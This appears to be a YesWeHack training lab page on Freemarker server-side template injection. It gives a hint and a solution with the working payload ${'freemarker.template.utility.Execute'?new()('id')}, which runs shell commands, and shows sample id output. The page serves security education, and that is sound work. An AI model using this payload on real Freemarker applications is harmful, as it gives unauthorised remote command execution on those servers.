Freemarker

Command execution

by YesWeHack
drag_indicator
info
drag_indicator
inputs
drag_indicator
inspect

Thanks to some features of Freemarker, it is possible to execute shell command.

Goal: Execute the id shell command

Hints

Hint #1
expand_more

Try using the freemarker.template.utility.Execute class.

Solution

Read the solution
expand_more

The solution was to find the class freemarker.template.utility.Execute which allows to execute a process next to the java.

Using this syntax: ${"freemarker.template.utility.Execute"?new()("COMMAND_SHELL")} it is possible to execute shell commands.

This would then have given: ${"freemarker.template.utility.Execute"?new()("id")} and it would have

returned something like: "Hello uid=1000(admin) gid=1000(admin ) groups=1000(admin),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(kvm),120(lpadmin),132(lxd)\n!"

drag_indicator
waf
INPUT
OUTPUT
drag_indicator
code
drag_indicator
result